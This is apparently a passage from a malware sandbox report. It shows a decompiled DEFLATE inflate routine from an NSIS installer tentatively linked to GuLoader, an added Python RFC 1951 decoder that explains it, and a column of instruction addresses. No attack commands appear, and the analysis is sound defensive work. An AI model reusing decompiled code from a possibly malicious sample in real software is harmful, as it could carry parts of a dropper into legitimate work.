                													__eflags = __eax - __ecx;
                													if(__eax >= __ecx) {
                														__edi = __edi - __eax;
                														__eflags = __edi;
                													} else {
                														__ecx = __ecx - __eax;
                														__edi = __ecx;
                													}
                													__eflags = __edi;
                													if(__edi == 0) {
                														goto L143;
                													}
                													L152:
                													__ecx =  *(__ebp - 0x20);
                													 *__eax =  *__ecx;
                													__eax = __eax + 1;
                													__ecx = __ecx + 1;
                													__edi = __edi - 1;
                													__eflags = __ecx - __esi[0x26e8];
                													 *(__ebp - 0x30) = __eax;
                													 *(__ebp - 0x20) = __ecx;
                													 *(__ebp - 0x2c) = __edi;
                													if(__ecx == __esi[0x26e8]) {
                														__ecx =  &(__esi[0x6e8]);
                														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                													}
                													_t357 =  &(__esi[1]);
                													 *_t357 = __esi[1] - 1;
                													__eflags =  *_t357;
                												} while ( *_t357 != 0);
                											}
                											goto L23;
                										case 6:
                											L156:
                											__eax =  *(__ebp - 0x2c);
                											__edi =  *(__ebp - 0x30);
                											__eflags = __eax;
                											if(__eax != 0) {
                												L172:
                												__cl = __esi[2];
                												 *__edi = __cl;
                												__edi = __edi + 1;
                												__eax = __eax - 1;
                												 *(__ebp - 0x30) = __edi;
                												 *(__ebp - 0x2c) = __eax;
                												goto L23;
                											}
                											L157:
                											__ecx = __esi[0x26e8];
                											__eflags = __edi - __ecx;
                											if(__edi != __ecx) {
                												L163:
                												__esi[0x26ea] = __edi;
                												__eax = E00406EB1( *((intOrPtr*)(__ebp + 8)));
                												__edi = __esi[0x26ea];
                												__ecx = __esi[0x26e9];
                												__eflags = __edi - __ecx;
                												 *(__ebp - 0x30) = __edi;
                												if(__edi >= __ecx) {
                													__eax = __esi[0x26e8];
                													__eax = __esi[0x26e8] - __edi;
                													__eflags = __eax;
                												} else {
                													__ecx = __ecx - __edi;
                													__eax = __ecx - __edi - 1;
                												}
                												__edx = __esi[0x26e8];
                												__eflags = __edi - __edx;
                												 *(__ebp - 8) = __edx;
                												if(__edi == __edx) {
                													__edx =  &(__esi[0x6e8]);
                													__eflags = __ecx - __edx;
                													if(__ecx != __edx) {
                														__edi = __edx;
                														__eflags = __edi - __ecx;
                														 *(__ebp - 0x30) = __edi;
                														if(__edi >= __ecx) {
                															__eax =  *(__ebp - 8);
                															__eax =  *(__ebp - 8) - __edi;
                															__eflags = __eax;
                														} else {
                															__ecx = __ecx - __edi;
                															__eax = __ecx;
                														}
                													}
                												}
                												__eflags = __eax;
                												if(__eax == 0) {
                													goto L183;
                												} else {
                													goto L172;
                												}
                											}
                											L158:
                											__eax = __esi[0x26e9];
                											__edx =  &(__esi[0x6e8]);
                											__eflags = __eax - __edx;
                											if(__eax == __edx) {
                												goto L163;
                											}
                											L159:
                											__edi = __edx;
                											__eflags = __edi - __eax;
                											if(__edi >= __eax) {
                												__ecx = __ecx - __edi;
                												__eflags = __ecx;
                												__eax = __ecx;
                											} else {
                												__eax = __eax - __edi;
                												__eax = __eax - 1;
                											}
                											__eflags = __eax;
                											if(__eax != 0) {
                												goto L172;
                											} else {
                												goto L163;
                											}
                										case 7:
                											L173:
                											__eflags = __ebx - 7;
                											if(__ebx > 7) {
                												__ebx = __ebx - 8;
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                												_t380 = __ebp - 0x38;
                												 *_t380 =  *(__ebp - 0x38) - 1;
                												__eflags =  *_t380;
                											}
                											goto L175;
                										case 8:
                											L4:
                											while(_t425 < 3) {
                												if( *(_t448 - 0x34) == 0) {
                													goto L182;
                												} else {
                													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                													_t425 = _t425 + 8;
                													continue;
                												}
                											}
                											_t425 = _t425 - 3;
                											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                											_t406 =  *(_t448 - 0x40) & 0x00000007;
                											asm("sbb ecx, ecx");
                											_t408 = _t406 >> 1;
                											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                											if(_t408 == 0) {
                												L24:
                												 *_t446 = 9;
                												_t436 = _t425 & 0x00000007;
                												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                												_t425 = _t425 - _t436;
                												goto L180;
                											}
                											L6:
                											_t411 = _t408 - 1;
                											if(_t411 == 0) {
                												L13:
                												__eflags =  *0x42e388;
                												if( *0x42e388 != 0) {
                													L22:
                													_t412 =  *0x40a40c; // 0x9
                													_t446[4] = _t412;
                													_t413 =  *0x40a410; // 0x5
                													_t446[4] = _t413;
                													_t414 =  *0x42d204; // 0x0
                													_t446[5] = _t414;
                													_t415 =  *0x42d200; // 0x0
                													_t446[6] = _t415;
                													L23:
                													 *_t446 =  *_t446 & 0x00000000;
                													goto L180;
                												} else {
                													_t26 = _t448 - 8;
                													 *_t26 =  *(_t448 - 8) & 0x00000000;
                													__eflags =  *_t26;
                													_t416 = 0x42d208;
                													goto L15;
                													L20:
                													 *_t416 = _t438;
                													_t416 = _t416 + 4;
                													__eflags = _t416 - 0x42d688;
                													if(_t416 < 0x42d688) {
                														L15:
                														__eflags = _t416 - 0x42d444;
                														_t438 = 8;
                														if(_t416 > 0x42d444) {
                															__eflags = _t416 - 0x42d608;
                															if(_t416 >= 0x42d608) {
                																__eflags = _t416 - 0x42d668;
                																if(_t416 < 0x42d668) {
                																	_t438 = 7;
                																}
                															} else {
                																_t438 = 9;
                															}
                														}
                														goto L20;
                													} else {
                														E00406F19(0x42d208, 0x120, 0x101, 0x40840c, 0x40844c, 0x42d204, 0x40a40c, 0x42db08, _t448 - 8);
                														_push(0x1e);
                														_pop(_t440);
                														_push(5);
                														_pop(_t419);
                														memset(0x42d208, _t419, _t440 << 2);
                														_t450 = _t450 + 0xc;
                														_t442 = 0x42d208 + _t440;
                														E00406F19(0x42d208, 0x1e, 0, 0x40848c, 0x4084c8, 0x42d200, 0x40a410, 0x42db08, _t448 - 8);
                														 *0x42e388 =  *0x42e388 + 1;
                														__eflags =  *0x42e388;
                														goto L22;
                													}
                												}
                											}
                											L7:
                											_t423 = _t411 - 1;
                											if(_t423 == 0) {
                												 *_t446 = 0xb;
                												goto L180;
                											}
                											L8:
                											if(_t423 != 1) {
                												goto L180;
                											}
                											goto L9;
                										case 9:
                											while(1) {
                												L27:
                												__eflags = __ebx - 0x20;
                												if(__ebx >= 0x20) {
                													break;
                												}
                												L25:
                												__eflags =  *(__ebp - 0x34);
                												if( *(__ebp - 0x34) == 0) {
                													goto L182;
                												}
                												L26:
                												__eax =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                												__ecx = __ebx;
                												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                												__ebx = __ebx + 8;
                												__eflags = __ebx;
                											}
                											L28:
                											__eax =  *(__ebp - 0x40);
                											__ebx = 0;
                											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                											 *(__ebp - 0x40) = 0;
                											__eflags = __eax;
                											__esi[1] = __eax;
                											if(__eax == 0) {
                												goto L53;
                											}
                											L29:
                											_push(0xa);
                											_pop(__eax);
                											goto L54;
                										case 0xa:
                											L30:
                											__eflags =  *(__ebp - 0x34);
                											if( *(__ebp - 0x34) == 0) {
                												goto L182;
                											}
                											L31:
                											__eax =  *(__ebp - 0x2c);
                											__eflags = __eax;
                											if(__eax != 0) {
                												L48:
                												__eflags = __eax -  *(__ebp - 0x34);
                												if(__eax >=  *(__ebp - 0x34)) {
                													__eax =  *(__ebp - 0x34);
                												}
                												__ecx = __esi[1];
                												__eflags = __ecx - __eax;
                												__edi = __ecx;
                												if(__ecx >= __eax) {
                													__edi = __eax;
                												}
                												__eax = E00405AB9( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                												_t80 =  &(__esi[1]);
                												 *_t80 = __esi[1] - __edi;
                												__eflags =  *_t80;
                												if( *_t80 == 0) {
                													L53:
                													__eax = __esi[0x145];
                													L54:
                													 *__esi = __eax;
                												}
                												goto L180;
                											}
                											L32:
                											__ecx = __esi[0x26e8];
                											__edx =  *(__ebp - 0x30);
                											__eflags = __edx - __ecx;
                											if(__edx != __ecx) {
                												L38:
                												__esi[0x26ea] = __edx;
                												__eax = E00406EB1( *((intOrPtr*)(__ebp + 8)));
                												__edx = __esi[0x26ea];
                												__ecx = __esi[0x26e9];
                												__eflags = __edx - __ecx;
                												 *(__ebp - 0x30) = __edx;
                												if(__edx >= __ecx) {
                													__eax = __esi[0x26e8];
                													__eax = __esi[0x26e8] - __edx;
                													__eflags = __eax;
                												} else {
                													__ecx = __ecx - __edx;
                													__eax = __ecx - __edx - 1;
                												}
                												__edi = __esi[0x26e8];
                												 *(__ebp - 0x2c) = __eax;
                												__eflags = __edx - __edi;
                												if(__edx == __edi) {
                													__edx =  &(__esi[0x6e8]);
                													__eflags = __edx - __ecx;
                													if(__eflags != 0) {
                														 *(__ebp - 0x30) = __edx;
                														if(__eflags >= 0) {
                															__edi = __edi - __edx;
                															__eflags = __edi;
                															__eax = __edi;
                														} else {
                															__ecx = __ecx - __edx;
                															__eax = __ecx;
                														}
                														 *(__ebp - 0x2c) = __eax;
                													}
                												}
                												__eflags = __eax;
                												if(__eax == 0) {
                													goto L183;
                												} else {
                													goto L48;
                												}
                											}
                											L33:
                											__eax = __esi[0x26e9];
                											__edi =  &(__esi[0x6e8]);
                											__eflags = __eax - __edi;
                											if(__eax == __edi) {
                												goto L38;
                											}
                											L34:
                											__edx = __edi;
                											__eflags = __edx - __eax;
                											 *(__ebp - 0x30) = __edx;
                											if(__edx >= __eax) {
                												__ecx = __ecx - __edx;
                												__eflags = __ecx;
                												__eax = __ecx;
                											} else {
                												__eax = __eax - __edx;
                												__eax = __eax - 1;
                											}
                											__eflags = __eax;
                											 *(__ebp - 0x2c) = __eax;
                											if(__eax != 0) {
                												goto L48;
                											} else {
                												goto L38;
                											}
                										case 0xb:
                											goto L56;
                										case 0xc:
                											L60:
                											__esi[1] = __esi[1] >> 0xa;
                											__eax = (__esi[1] >> 0xa) + 4;
                											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                												goto L68;
                											}
                											goto L61;
                										case 0xd:
                											while(1) {
                												L93:
                												__eax = __esi[1];
                												__ecx = __esi[2];
                												__edx = __eax;
                												__eax = __eax & 0x0000001f;
                												__edx = __edx >> 5;
                												__eax = __edx + __eax + 0x102;
                												__eflags = __esi[2] - __eax;
                												if(__esi[2] >= __eax) {
                													break;
                												}
                												L73:
                												__eax = __esi[0x143];
                												while(1) {
                													L76:
                													__eflags = __ebx - __eax;
                													if(__ebx >= __eax) {
                														break;
                													}
                													L74:
                													__eflags =  *(__ebp - 0x34);
                													if( *(__ebp - 0x34) == 0) {
                														goto L182;
                													}
                													L75:
                													__ecx =  *(__ebp - 0x38);
                													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                													__ecx = __ebx;
                													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                													__ebx = __ebx + 8;
                													__eflags = __ebx;
                												}
                												L77:
                												__eax =  *(0x40a3e8 + __eax * 2) & 0x0000ffff;
                												__eax = __eax &  *(__ebp - 0x40);
                												__ecx = __esi[0x144];
                												__eax = __esi[0x144] + __eax * 4;
                												__edx =  *(__eax + 1) & 0x000000ff;
                												__eax =  *(__eax + 2) & 0x0000ffff;
                												__eflags = __eax - 0x10;
                												 *(__ebp - 0x14) = __eax;
                												if(__eax >= 0x10) {
                													L79:
                													__eflags = __eax - 0x12;
                													if(__eax != 0x12) {
                														__eax = __eax + 0xfffffff2;
                														 *(__ebp - 8) = 3;
                													} else {
                														_push(7);
                														 *(__ebp - 8) = 0xb;
                														_pop(__eax);
                													}
                													while(1) {
                														L84:
                														__ecx = __eax + __edx;
                														__eflags = __ebx - __eax + __edx;
                														if(__ebx >= __eax + __edx) {
                															break;
                														}
                														L82:
                														__eflags =  *(__ebp - 0x34);
                														if( *(__ebp - 0x34) == 0) {
                															goto L182;
                														}
                														L83:
                														__ecx =  *(__ebp - 0x38);
                														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                														__ecx = __ebx;
                														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                														__ebx = __ebx + 8;
                														__eflags = __ebx;
                													}
                													L85:
                													__ecx = __edx;
                													__ebx = __ebx - __edx;
                													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                													 *(0x40a3e8 + __eax * 2) & 0x0000ffff =  *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                													__edx =  *(__ebp - 8);
                													__ebx = __ebx - __eax;
                													__edx =  *(__ebp - 8) + ( *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                													__ecx = __eax;
                													__eax = __esi[1];
                													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                													__ecx = __esi[2];
                													__eax = __eax >> 5;
                													__edi = __eax >> 0x00000005 & 0x0000001f;
                													__eax = __eax & 0x0000001f;
                													__eax = __edi + __eax + 0x102;
                													__edi = __edx + __ecx;
                													__eflags = __edx + __ecx - __eax;
                													if(__edx + __ecx > __eax) {
                														goto L9;
                													}
                													L86:
                													__eflags =  *(__ebp - 0x14) - 0x10;
                													if( *(__ebp - 0x14) != 0x10) {
                														L89:
                														__edi = 0;
                														__eflags = 0;
                														L90:
                														__eax = __esi + 0xc + __ecx * 4;
                														do {
                															L91:
                															 *__eax = __edi;
                															__ecx = __ecx + 1;
                															__eax = __eax + 4;
                															__edx = __edx - 1;
                															__eflags = __edx;
                														} while (__edx != 0);
                														__esi[2] = __ecx;
                														continue;
                													}
                													L87:
                													__eflags = __ecx - 1;
                													if(__ecx < 1) {
                														goto L9;
                													}
                													L88:
                													__edi =  *(__esi + 8 + __ecx * 4);
                													goto L90;
                												}
                												L78:
                												__ecx = __edx;
                												__ebx = __ebx - __edx;
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                												__ecx = __esi[2];
                												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                												__esi[2] = __esi[2] + 1;
                											}
                											L94:
                											__eax = __esi[1];
                											__esi[0x144] = __esi[0x144] & 0x00000000;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                											__edi = __eax;
                											__eax = __eax >> 5;
                											__edi = __edi & 0x0000001f;
                											__ecx = 0x101;
                											__eax = __eax & 0x0000001f;
                											__edi = __edi + 0x101;
                											__eax = __eax + 1;
                											__edx = __ebp - 0xc;
                											 *(__ebp - 0x14) = __eax;
                											 &(__esi[0x148]) = __ebp - 4;
                											 *(__ebp - 4) = 9;
                											__ebp - 0x18 =  &(__esi[3]);
                											 *(__ebp - 0x10) = 6;
                											__eax = E00406F19( &(__esi[3]), __edi, 0x101, 0x40840c, 0x40844c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                											__eflags =  *(__ebp - 4);
                											if( *(__ebp - 4) == 0) {
                												__eax = __eax | 0xffffffff;
                												__eflags = __eax;
                											}
                											__eflags = __eax;
                											if(__eax != 0) {
                												goto L9;
                											} else {
                												L97:
                												__ebp - 0xc =  &(__esi[0x148]);
                												__ebp - 0x10 = __ebp - 0x1c;
                												__eax = __esi + 0xc + __edi * 4;
                												__eax = E00406F19(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40848c, 0x4084c8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                												__eflags = __eax;
                												if(__eax != 0) {
                													goto L9;
                												}
                												L98:
                												__eax =  *(__ebp - 0x10);
                												__eflags =  *(__ebp - 0x10);
                												if( *(__ebp - 0x10) != 0) {
                													L100:
                													__cl =  *(__ebp - 4);
                													 *__esi =  *__esi & 0x00000000;
                													__eflags =  *__esi;
                													__esi[4] = __al;
                													__eax =  *(__ebp - 0x18);
                													__esi[5] =  *(__ebp - 0x18);
                													__eax =  *(__ebp - 0x1c);
                													__esi[4] = __cl;
                													__esi[6] =  *(__ebp - 0x1c);
                													goto L101;
                												}
                												L99:
                												__eflags = __edi - 0x101;
                												if(__edi > 0x101) {
                													goto L9;
                												}
                												goto L100;
                											}
                										case 0xe:
                											goto L9;
                										case 0xf:
                											L175:
                											__eax =  *(__ebp - 0x30);
                											__esi[0x26ea] =  *(__ebp - 0x30);
                											__eax = E00406EB1( *((intOrPtr*)(__ebp + 8)));
                											__ecx = __esi[0x26ea];
                											__edx = __esi[0x26e9];
                											__eflags = __ecx - __edx;
                											 *(__ebp - 0x30) = __ecx;
                											if(__ecx >= __edx) {
                												__eax = __esi[0x26e8];
                												__eax = __esi[0x26e8] - __ecx;
                												__eflags = __eax;
                											} else {
                												__edx = __edx - __ecx;
                												__eax = __edx - __ecx - 1;
                											}
                											__eflags = __ecx - __edx;
                											 *(__ebp - 0x2c) = __eax;
                											if(__ecx != __edx) {
                												L183:
                												__edi = 0;
                												goto L10;
                											} else {
                												L179:
                												__eax = __esi[0x145];
                												__eflags = __eax - 8;
                												 *__esi = __eax;
                												if(__eax != 8) {
                													L184:
                													0 = 1;
                													goto L10;
                												}
                												goto L180;
                											}
                									}
                								}
                								L181:
                								goto L9;
                							}
                							L70:
                							if( *__edi == __eax) {
                								goto L72;
                							}
                							L71:
                							__esi[2] = __esi[2] & __eax;
                							 *__esi = 0xd;
                							goto L93;
                						}
                					}
                				}
                				L182:
                				_t443 = 0;
                				_t446[0x147] =  *(_t448 - 0x40);
                				_t446[0x146] = _t425;
                				( *(_t448 + 8))[1] = 0;
                				goto L11;
                			}
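
The switch above is a DEFLATE (RFC 1951) inflate state machine rather than a cipher: case 8 reads the 3-bit block header (BFINAL, BTYPE), the loop at 0x42d208 fills 288 fixed literal/length code lengths with 8 (entries 0-143), 9 (144-255), 7 (256-279) and 8 (280-287) and 30 distance lengths with 5, the E00406F19 calls receive the 0x120/0x101 and 0x1e/0 table sizes, and case 0xd decodes HLIT+HDIST+258 code lengths with the 16/17/18 repeat codes and their bases of 3 and 11. That layout (a huft_build-style helper, fixed tables in global memory, a sliding window flushed through E00406EB1) is consistent with the inflate.c bundled in NSIS installers, which commonly carry GuLoader; treat that attribution as an inference, not something the report states. The decoder below is an added example written for this report, not code from the sample, from Joe Sandbox or from any installer runtime. It implements the same three block types so the listing can be read against working code; the identification of the routine as inflate is an inference from its constants, and the zlib-produced inputs used for checking are constructed test data.

```python
"""Minimal RFC 1951 (DEFLATE) decoder mirroring the decompiled state machine above.
Added example for this report: not code from the sample, from NSIS or from Joe Sandbox.
Assumption: the decompiled routine is an inflate implementation, inferred from its constants."""
import zlib  # only used to build constructed test input; the decoder itself never calls it

# Length/distance bases and extra-bit counts (RFC 1951, 3.2.5)
LEN_BASE = [3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 15, 17, 19, 23, 27, 31, 35, 43, 51, 59,
            67, 83, 99, 115, 131, 163, 195, 227, 258]
LEN_EXTRA = [0] * 8 + [1] * 4 + [2] * 4 + [3] * 4 + [4] * 4 + [5] * 4 + [0]
DIST_BASE = [1, 2, 3, 4, 5, 7, 9, 13, 17, 25, 33, 49, 65, 97, 129, 193, 257, 385, 513,
             769, 1025, 1537, 2049, 3073, 4097, 6145, 8193, 12289, 16385, 24577]
DIST_EXTRA = [max(0, i // 2 - 1) for i in range(30)]
CL_ORDER = [16, 17, 18, 0, 8, 7, 9, 6, 10, 5, 11, 4, 12, 3, 13, 2, 14, 1, 15]  # RFC 1951, 3.2.7
# Fixed tables: the 288-entry loop in the listing assigns 8 (0-143), 9 (144-255),
# 7 (256-279) and 8 (280-287); its 30 distance entries are filled with 5.
FIXED_LIT, FIXED_DIST = [8] * 144 + [9] * 112 + [7] * 24 + [8] * 8, [5] * 30


class BitReader:
    """LSB-first bit buffer, the same fill pattern as the (*in & 0xff) << bitcount loops above."""
    def __init__(self, data):
        self.data, self.pos, self.buf, self.cnt = data, 0, 0, 0

    def bits(self, n):
        while self.cnt < n:
            self.buf |= self.data[self.pos] << self.cnt
            self.pos, self.cnt = self.pos + 1, self.cnt + 8
        value, self.buf, self.cnt = self.buf & ((1 << n) - 1), self.buf >> n, self.cnt - n
        return value

    def align(self):
        self.buf = self.cnt = 0  # at most 7 bits are ever buffered, so this is byte alignment


def build_huffman(lengths):
    """Canonical Huffman table {(code_length, code): symbol} from a list of code lengths."""
    table, code = {}, 0
    for ln in range(1, max(lengths, default=0) + 1):
        for sym, length in enumerate(lengths):
            if length == ln:
                table[(ln, code)] = sym
                code += 1
        code <<= 1
    return table


def decode_sym(br, table):
    code = 0
    for ln in range(1, 16):  # codes are at most 15 bits and are read MSB-first
        code = (code << 1) | br.bits(1)
        if (ln, code) in table:
            return table[(ln, code)]
    raise ValueError("invalid Huffman code")


def read_dynamic_tables(br):
    """Cases 0xc/0xd above: HLIT, HDIST, HCLEN, then HLIT+HDIST run-length coded lengths."""
    hlit, hdist, hclen = br.bits(5) + 257, br.bits(5) + 1, br.bits(4) + 4
    cl_lengths = [0] * 19
    for i in range(hclen): cl_lengths[CL_ORDER[i]] = br.bits(3)
    cl_table, lengths = build_huffman(cl_lengths), []
    while len(lengths) < hlit + hdist:
        sym = decode_sym(br, cl_table)
        if sym < 16:
            lengths.append(sym)
        elif sym == 16:  # repeat previous length 3..6 times (2 extra bits)
            if not lengths:
                raise ValueError("code 16 with no previous length")
            lengths += [lengths[-1]] * (3 + br.bits(2))
        elif sym == 17: lengths += [0] * (3 + br.bits(3))   # 3..10 zeros (3 extra bits)
        else: lengths += [0] * (11 + br.bits(7))            # 18: 11..138 zeros (7 extra bits)
    if len(lengths) > hlit + hdist:
        raise ValueError("code lengths overrun the table")
    return build_huffman(lengths[:hlit]), build_huffman(lengths[hlit:])


def inflate(raw):
    """Decode a raw DEFLATE stream. Returns (output bytes, list of BTYPE values seen)."""
    br, out, types = BitReader(raw), bytearray(), []
    while True:
        bfinal, btype = br.bits(1), br.bits(2)  # the three header bits read in case 8
        types.append(btype)
        if btype == 0:  # stored block
            br.align()
            length, nlength = br.bits(16), br.bits(16)
            if length != (~nlength & 0xFFFF):  # RFC check; the listing keeps only LEN
                raise ValueError("stored block LEN/NLEN mismatch")
            out += br.data[br.pos:br.pos + length]; br.pos += length
        elif btype in (1, 2):
            lit, dist = (build_huffman(FIXED_LIT), build_huffman(FIXED_DIST)) if btype == 1 else read_dynamic_tables(br)
            while True:
                sym = decode_sym(br, lit)
                if sym < 256:
                    out.append(sym)
                elif sym == 256:  # end of block
                    break
                else:
                    i = sym - 257
                    length = LEN_BASE[i] + br.bits(LEN_EXTRA[i])
                    d = decode_sym(br, dist)
                    distance = DIST_BASE[d] + br.bits(DIST_EXTRA[d])
                    if distance > len(out):
                        raise ValueError("distance reaches before start of output")
                    for _ in range(length): out.append(out[-distance])
        else:
            raise ValueError("reserved BTYPE 3")
        if bfinal:
            return bytes(out), types


def deflate_raw(data, level):
    """Constructed test input: a raw DEFLATE stream (no zlib header) produced by zlib."""
    comp = zlib.compressobj(level, zlib.DEFLATED, -15)
    return comp.compress(data) + comp.flush()
```

Two differences from the listing are worth keeping in mind while reading it. The stored-block path in case 9 consumes 32 bits and keeps only the low 16 as the length, so no NLEN comparison is visible in this excerpt, whereas the decoder above rejects a mismatch. And the decoder above writes to a flat buffer, while the listing copies through a sliding window (the esi[0x26e8]/esi[0x26e9] wrap logic around E00406EB1), which is where an analyst should look for bounds handling. Routines of this shape are easy to mistake for a custom cipher; checking the constants against RFC 1951 is the quickest way to tell.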

[Instruction-address column for the decompiled code above (addresses between 0x004064d9 and 0x00406e3b, with 0x00000000 entries) omitted; as extracted it no longer aligns with the listing.]
                0x00406aa3
                0x00406aa3
                0x00406aa3
                0x00406aaa
                0x00406aaa
                0x00406ab2
                0x00406ab5
                0x00406ab8
                0x00406abb
                0x00406abf
                0x00406ac2
                0x00406ac4
                0x00406ac7
                0x00406ac9
                0x00406add
                0x00406add
                0x00406ae0
                0x00406afa
                0x00406afa
                0x00406afd
                0x00000000
                0x00000000
                0x00406b03
                0x00406b03
                0x00406b06
                0x00000000
                0x00000000
                0x00406b0c
                0x00406b0c
                0x00000000
                0x00406b0c
                0x00406ae2
                0x00406ae5
                0x00406aec
                0x00406aef
                0x00000000
                0x00406aef
                0x00406acb
                0x00406acf
                0x00406ad2
                0x00000000
                0x00000000
                0x00406b17
                0x00406b17
                0x00406b3c
                0x00406b3c
                0x00406b3c
                0x00406b3e
                0x00000000
                0x00000000
                0x00406b1c
                0x00406b1c
                0x00406b20
                0x00000000
                0x00000000
                0x00406b26
                0x00406b26
                0x00406b29
                0x00406b2c
                0x00406b2f
                0x00406b31
                0x00406b33
                0x00406b36
                0x00406b39
                0x00406b39
                0x00406b39
                0x00406b40
                0x00406b48
                0x00406b4b
                0x00406b4e
                0x00406b50
                0x00406b53
                0x00406b53
                0x00406b55
                0x00406b59
                0x00406b5c
                0x00406b5f
                0x00406b62
                0x00000000
                0x00000000
                0x00406b68
                0x00406b68
                0x00406b8d
                0x00406b8d
                0x00406b8d
                0x00406b8f
                0x00000000
                0x00000000
                0x00406b6d
                0x00406b6d
                0x00406b71
                0x00000000
                0x00000000
                0x00406b77
                0x00406b77
                0x00406b7a
                0x00406b7d
                0x00406b80
                0x00406b82
                0x00406b84
                0x00406b87
                0x00406b8a
                0x00406b8a
                0x00406b8a
                0x00406b91
                0x00406b91
                0x00406b99
                0x00406b9c
                0x00406b9f
                0x00406ba2
                0x00406ba6
                0x00406ba9
                0x00406bab
                0x00406bae
                0x00406bb1
                0x00406bcb
                0x00406bcb
                0x00406bce
                0x00000000
                0x00000000
                0x00406bd4
                0x00406bd4
                0x00406bd7
                0x00406bde
                0x00000000
                0x00406bde
                0x00406bb3
                0x00406bb6
                0x00406bbd
                0x00406bc0
                0x00000000
                0x00000000
                0x00406be6
                0x00406be6
                0x00406c0b
                0x00406c0b
                0x00406c0b
                0x00406c0d
                0x00000000
                0x00000000
                0x00406beb
                0x00406beb
                0x00406bef
                0x00000000
                0x00000000
                0x00406bf5
                0x00406bf5
                0x00406bf8
                0x00406bfb
                0x00406bfe
                0x00406c00
                0x00406c02
                0x00406c05
                0x00406c08
                0x00406c08
                0x00406c08
                0x00406c0f
                0x00406c17
                0x00406c1a
                0x00406c1d
                0x00406c1f
                0x00406c22
                0x00406c22
                0x00406c24
                0x00000000
                0x00000000
                0x00406c2a
                0x00406c2a
                0x00406c2d
                0x00406c32
                0x00406c34
                0x00406c3a
                0x00406c3c
                0x00406c51
                0x00406c53
                0x00406c53
                0x00406c3e
                0x00406c44
                0x00406c46
                0x00406c48
                0x00406c48
                0x00406c55
                0x00406c59
                0x00406c5c
                0x00406c62
                0x00406c62
                0x00406c65
                0x00406c65
                0x00406c65
                0x00406c67
                0x00000000
                0x00000000
                0x00406c6d
                0x00406c6d
                0x00406c73
                0x00406c75
                0x00406c9a
                0x00406c9d
                0x00406ca3
                0x00406ca8
                0x00406cae
                0x00406cb4
                0x00406cb6
                0x00406cb9
                0x00406cc2
                0x00406cc8
                0x00406cc8
                0x00406cbb
                0x00406cbd
                0x00406cbf
                0x00406cbf
                0x00406cca
                0x00406cd0
                0x00406cd2
                0x00406cd5
                0x00406cd7
                0x00406cdd
                0x00406cdf
                0x00406ce1
                0x00406ce3
                0x00406ce5
                0x00406ce8
                0x00406cf1
                0x00406cf4
                0x00406cf4
                0x00406cea
                0x00406cea
                0x00406ced
                0x00406ced
                0x00406ce8
                0x00406cdf
                0x00406cf6
                0x00406cf8
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406cf8
                0x00406c77
                0x00406c77
                0x00406c7d
                0x00406c83
                0x00406c85
                0x00000000
                0x00000000
                0x00406c87
                0x00406c87
                0x00406c89
                0x00406c8b
                0x00406c94
                0x00406c94
                0x00406c8d
                0x00406c8d
                0x00406c90
                0x00406c90
                0x00406c96
                0x00406c98
                0x00000000
                0x00000000
                0x00406cfe
                0x00406cfe
                0x00406d03
                0x00406d05
                0x00406d06
                0x00406d07
                0x00406d08
                0x00406d0e
                0x00406d11
                0x00406d14
                0x00406d17
                0x00406d19
                0x00406d1f
                0x00406d1f
                0x00406d22
                0x00406d22
                0x00406d22
                0x00406d22
                0x00406d2b
                0x00000000
                0x00000000
                0x00406d30
                0x00406d30
                0x00406d33
                0x00406d36
                0x00406d38
                0x00406dcf
                0x00406dcf
                0x00406dd2
                0x00406dd4
                0x00406dd5
                0x00406dd6
                0x00406dd9
                0x00000000
                0x00406dd9
                0x00406d3e
                0x00406d3e
                0x00406d44
                0x00406d46
